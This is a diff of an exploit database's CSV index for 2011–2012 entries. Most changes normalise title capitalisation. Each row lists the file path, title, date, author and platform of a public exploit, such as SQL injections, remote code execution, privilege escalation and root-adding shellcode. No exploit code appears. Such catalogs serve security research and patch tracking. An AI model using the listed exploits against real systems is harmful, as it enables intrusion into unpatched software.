+18121,platforms/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,Metasploit,windows,remote,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service Exploit",2011-11-18,hellok,windows,dos,0 18125,platforms/windows/remote/18125.rb,"Wireshark - console.lua pre-loading",2011-11-19,Metasploit,windows,remote,0 -18126,platforms/php/webapps/18126.txt,"Wordpress jetpack Plugin - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps,0 +18126,platforms/php/webapps/18126.txt,"WordPress jetpack Plugin - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps,0 18127,platforms/php/webapps/18127.txt,"Freelancer Calendar 1.01 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18128,platforms/php/webapps/18128.txt,"Valid tiny-erp 1.6 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Exploit",2011-11-20,Metasploit,windows,remote,0 -18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS (Metasploit)",2011-11-21,hellok,win_x86,local,0 +18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit)",2011-11-21,hellok,win_x86,local,0 18138,platforms/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - '.wav' Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0 18143,platforms/windows/local/18143.rb,"Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0 18145,platforms/linux/remote/18145.py,"Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 -18147,platforms/linux/local/18147.c,"bzexe (bzip2) - race condition",2011-11-23,vladz,linux,local,0 +18147,platforms/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,linux,local,0 18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - (Downloads) Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (1)",2011-11-23,EgiX,php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 @@ -15769,14 +15770,14 @@ id,file,description,date,author,platform,type,port 18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 -19400,platforms/php/webapps/19400.txt,"Wordpress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 +19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18167,platforms/php/webapps/18167.zip,"JQuery-Real-Person plugin - Bypass captcha",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,Metasploit,hardware,remote,0 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 - Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0 -18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 - .asx File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",windows,local,0 +18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",windows,local,0 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)",2011-11-30,ryujin,windows,local,0 18177,platforms/php/webapps/18177.txt,"WikkaWiki 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit '.m3u' (Metasploit)",2011-11-30,Rh0,windows,local,0 @@ -15801,14 +15802,14 @@ id,file,description,date,author,platform,type,port 18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 & 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0 18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 - (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",php,webapps,0 -18207,platforms/php/webapps/18207.txt,"AlstraSoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 +18207,platforms/php/webapps/18207.txt,"Alstrasoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 18208,platforms/php/webapps/18208.rb,"Family Connections - less.php Remote Command Execution",2011-12-07,Metasploit,php,webapps,0 18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,php,webapps,0 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0 -18218,platforms/php/webapps/18218.txt,"QContacts 1.0.6 - (Joomla component) SQL Injection",2011-12-08,Don,php,webapps,0 +18218,platforms/php/webapps/18218.txt,"QContacts 1.0.6 - (Joomla Component) SQL Injection",2011-12-08,Don,php,webapps,0 18210,platforms/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,php,webapps,0 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin - SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 -18213,platforms/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 +18213,platforms/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution",2011-12-07,EgiX,php,webapps,0 18214,platforms/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection / Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow (PoC)",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache HTTP Server - Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 @@ -15820,13 +15821,13 @@ id,file,description,date,author,platform,type,port 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,linux,local,0 18230,platforms/php/webapps/18230.txt,"FCMS 2.7.2 CMS - Multiple Persistent Cross-Site Scripting",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 -18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 +18231,platforms/php/webapps/18231.txt,"WordPress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 18232,platforms/php/webapps/18232.txt,"FCMS 2.7.2 CMS - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,php,webapps,0 -18239,platforms/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution Exploit (Metasploit)",2011-12-13,Metasploit,php,webapps,0 -18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,Metasploit,windows,remote,0 +18239,platforms/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,php,webapps,0 +18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - WebServer Stack Buffer Overflow",2011-12-13,Metasploit,windows,remote,0 18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2)",2011-12-14,Metasploit,php,webapps,0 18246,platforms/php/webapps/18246.txt,"Seotoaster - SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 @@ -15834,9 +15835,9 @@ id,file,description,date,author,platform,type,port 18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0 18250,platforms/php/webapps/18250.txt,"DotA OpenStats 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps,0 18251,platforms/php/webapps/18251.txt,"Joomla Component (com_dshop) - SQL Injection",2011-12-19,CoBRa_21,php,webapps,0 -18257,platforms/windows/dos/18257.txt,"IrfanView - .tiff Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0 +18257,platforms/windows/dos/18257.txt,"Irfanview - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0 -18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0 +18256,platforms/windows/dos/18256.txt,"Irfanview FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0 18258,platforms/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local,0 18259,platforms/php/webapps/18259.txt,"Infoproject Business Hero - Multiple Vulnerabilities",2011-12-21,LiquidWorm,php,webapps,0 18260,platforms/jsp/webapps/18260.txt,"Barracuda Control Center 620 - Multiple Web Vulnerabilities",2011-12-21,Vulnerability-Lab,jsp,webapps,0 @@ -15847,20 +15848,20 @@ id,file,description,date,author,platform,type,port 18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems 2.3.x - Multiple Remote Code Execution Vulnerabilities",2011-12-23,mr_me,php,webapps,0 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0 -18271,platforms/windows/dos/18271.py,"Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 -18272,platforms/windows/dos/18272.py,"Windows Explorer - Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 +18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 +18272,platforms/windows/dos/18272.py,"Microsoft Windows Explorer - Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 18274,platforms/php/webapps/18274.txt,"openemr 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 18275,platforms/win_x86-64/dos/18275.txt,"Safari - GdiDrawStream BSoD",2011-12-18,webDEViL,win_x86-64,dos,0 -18276,platforms/php/webapps/18276.txt,"Wordpress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 +18276,platforms/php/webapps/18276.txt,"WordPress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script - Arbitrary File Upload",2011-12-26,ySecurity,php,webapps,0 18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos,0 18280,platforms/linux/remote/18280.c,"TelnetD encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0 -18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 +18412,platforms/php/webapps/18412.php,"WordPress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 18287,platforms/php/webapps/18287.php,"Joomla Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0 18285,platforms/windows/dos/18285.py,"VLC 1.1.11 - (libav) libavcodec_plugin.dll Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0 18288,platforms/php/webapps/18288.txt,"DIY-CMS blog mod - SQL Injection",2011-12-29,snup,php,webapps,0 -18290,platforms/php/webapps/18290.txt,"Winn GuestBook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,php,webapps,0 +18290,platforms/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,php,webapps,0 18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS) Exploit",2011-12-30,cheffner,hardware,remote,0 18292,platforms/php/webapps/18292.txt,"Dede CMS - SQL Injection",2011-12-30,"CWH and Nafsh",php,webapps,0 18293,platforms/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",php,webapps,0 @@ -15874,7 +15875,7 @@ id,file,description,date,author,platform,type,port 19024,platforms/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta - Remote Format String Overflow",2012-06-08,demonalex,windows,dos,0 18305,platforms/php/dos/18305.py,"PHP Hash Table Collision - (PoC)",2012-01-03,"Christian Mehlmauer",php,dos,0 18308,platforms/php/webapps/18308.txt,"Typo3 4.5-4.7 - Remote Code Execution (Remote File Inclusion / Local File Inclusion)",2012-01-04,MaXe,php,webapps,0 -18309,platforms/windows/dos/18309.pl,"VLC Media Player 1.1.11 - (.amr) Denial of Service (PoC)",2012-01-04,Fabi@habsec,windows,dos,0 +18309,platforms/windows/dos/18309.pl,"VLC Media Player 1.1.11 - '.amr' Denial of Service (PoC)",2012-01-04,Fabi@habsec,windows,dos,0 18314,platforms/php/webapps/18314.txt,"Posse Softball Director CMS - SQL Injection",2012-01-04,"H4ckCity Security Team",php,webapps,0 18983,platforms/php/webapps/18983.php,"Mnews 1.1 - (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 18984,platforms/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution",2012-06-05,Metasploit,multiple,remote,0 @@ -15884,13 +15885,13 @@ id,file,description,date,author,platform,type,port 18979,platforms/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Persistent Cross-Site Scripting",2012-06-03,"Henry Hoggard",php,webapps,0 18980,platforms/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 - Tagging Persistent Cross-Site Scripting",2012-06-03,"Henry Hoggard",php,webapps,0 18320,platforms/php/webapps/18320.txt,"Posse Softball Director CMS - 'team.php' Blind SQL Injection",2012-01-04,"Easy Laster",php,webapps,0 -19381,platforms/php/webapps/19381.php,"SugarCRM CE 6.3.1 - 'unserialize()' PHP Code Execution",2012-06-23,EgiX,php,webapps,0 +19381,platforms/php/webapps/19381.php,"SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution",2012-06-23,EgiX,php,webapps,0 18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0 18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 18327,platforms/netware/dos/18327.txt,"Novell Netware - XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18328,platforms/netware/dos/18328.txt,"Novell Netware - XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 -18330,platforms/php/webapps/18330.txt,"Wordpress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 +18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution",2012-01-08,"b33f & g11tch",windows,local,0 18335,platforms/php/webapps/18335.txt,"MangosWeb - SQL Injection",2012-01-08,Hood3dRob1n,php,webapps,0 18336,platforms/hardware/dos/18336.pl,"AirTies-4450 - Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 @@ -15901,17 +15902,17 @@ id,file,description,date,author,platform,type,port 18341,platforms/php/webapps/18341.txt,"clip bucket 2.6 - Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps,0 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable - Remote File Inclusion",2012-01-09,"Opa Yong",php,webapps,0 18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x - (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0 -18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 - Path Traversal",2012-01-10,chap0,php,webapps,0 +18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 - Directory Traversal",2012-01-10,chap0,php,webapps,0 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow",2012-01-10,b33f,windows,remote,0 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 -18350,platforms/php/webapps/18350.txt,"Wordpress Age Verification Plugin 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 +18350,platforms/php/webapps/18350.txt,"WordPress Age Verification Plugin 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 18351,platforms/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0 -18353,platforms/php/webapps/18353.txt,"Wordpress wp-autoyoutube plugin - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0 +18353,platforms/php/webapps/18353.txt,"WordPress wp-autoyoutube plugin - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0 18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter)",2012-01-12,TheXero,windows,remote,0 -18355,platforms/php/webapps/18355.txt,"Wordpress Count-per-day plugin - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 +18355,platforms/php/webapps/18355.txt,"WordPress Count-per-day plugin - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 18357,platforms/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload",2012-01-13,Dr.KroOoZ,php,webapps,0 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management - Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0 @@ -15927,7 +15928,7 @@ id,file,description,date,author,platform,type,port 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Buffer Overflow",2012-01-14,Metasploit,linux,remote,0 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,bsd,remote,0 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (2)",2012-01-17,Metasploit,osx,remote,0 -18378,platforms/linux/dos/18378.c,"Linux IGMP - Remote Denial of Service (Introduced in linux-2.6.36)",2012-01-17,kingcope,linux,dos,0 +18378,platforms/linux/dos/18378.c,"Linux 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,linux,dos,0 18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 18380,platforms/php/webapps/18380.txt,"Joomla Discussions Component (com_discussions) - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0 18975,platforms/php/webapps/18975.rb,"Log1 CMS - writeInfo() PHP Code Injection",2012-06-03,Metasploit,php,webapps,0 @@ -15940,14 +15941,14 @@ id,file,description,date,author,platform,type,port 18386,platforms/php/webapps/18386.txt,"DZCP (deV!L_z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager - ov.dll _OVBuildPath Buffer Overflow",2012-01-20,Metasploit,windows,remote,0 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting",2012-01-19,MaXe,php,webapps,0 -18390,platforms/php/webapps/18390.txt,"Wordpress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting",2012-01-19,"Gianluca Brindisi",php,webapps,0 +18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting",2012-01-19,"Gianluca Brindisi",php,webapps,0 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 -18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 +18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - (Uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 18393,platforms/linux/remote/18393.rb,"Gitorious - Arbitrary Command Execution",2012-01-20,Metasploit,linux,remote,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 -18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authenticated Command Execution",2012-01-20,Abysssec,windows,remote,0 +18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution",2012-01-20,Abysssec,windows,remote,0 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 - Buffer Overflow (Egghunter)",2012-01-21,red-dragon,windows,remote,0 18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code Injection",2012-01-21,Or4nG.M4N,php,webapps,0 18403,platforms/php/webapps/18403.txt,"Nova CMS - Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0 @@ -15955,7 +15956,7 @@ id,file,description,date,author,platform,type,port 18399,platforms/windows/dos/18399.py,"VLC 1.2.0 - (libtaglib_pluggin.dll) Denial of Service",2012-01-20,"Mitchell Adair",windows,dos,0 18405,platforms/asp/webapps/18405.txt,"ARYADAD - Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0 -18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 Wordpress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 +18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0 18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - '.aiff' Denial of Service",2012-04-04,condis,windows,dos,0 18699,platforms/php/webapps/18699.txt,"PlumeCMS 1.2.4 - Multiple Persistent Cross-Site Scripting",2012-04-04,"Ivano Binetti",php,webapps,0 @@ -15963,14 +15964,14 @@ id,file,description,date,author,platform,type,port 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection",2012-01-23,Vulnerability-Lab,php,webapps,0 18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0 18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 -18417,platforms/php/webapps/18417.txt,"Wordpress 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 +18417,platforms/php/webapps/18417.txt,"WordPress 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - Cross-Site Request Forgery",2012-01-26,Cyber-Crystal,php,webapps,0 18419,platforms/php/webapps/18419.html,"phpList 2.10.9 - Cross-Site Request Forgery / Cross-Site Scripting",2012-01-26,Cyber-Crystal,php,webapps,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8/ 2.9 - Cross-Site Scripting / SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - magentservice.exe Overflow",2012-01-27,Metasploit,windows,remote,0 18424,platforms/php/webapps/18424.rb,"vBSEO 3.6.0 - 'proc_deutf()' Remote PHP Code Injection (Metasploit)",2012-01-27,EgiX,php,webapps,0 -18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,Metasploit,windows,remote,0 +18426,platforms/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,Metasploit,windows,remote,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - Cross-Site Request Forgery Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",multiple,webapps,0 @@ -15979,7 +15980,7 @@ id,file,description,date,author,platform,type,port 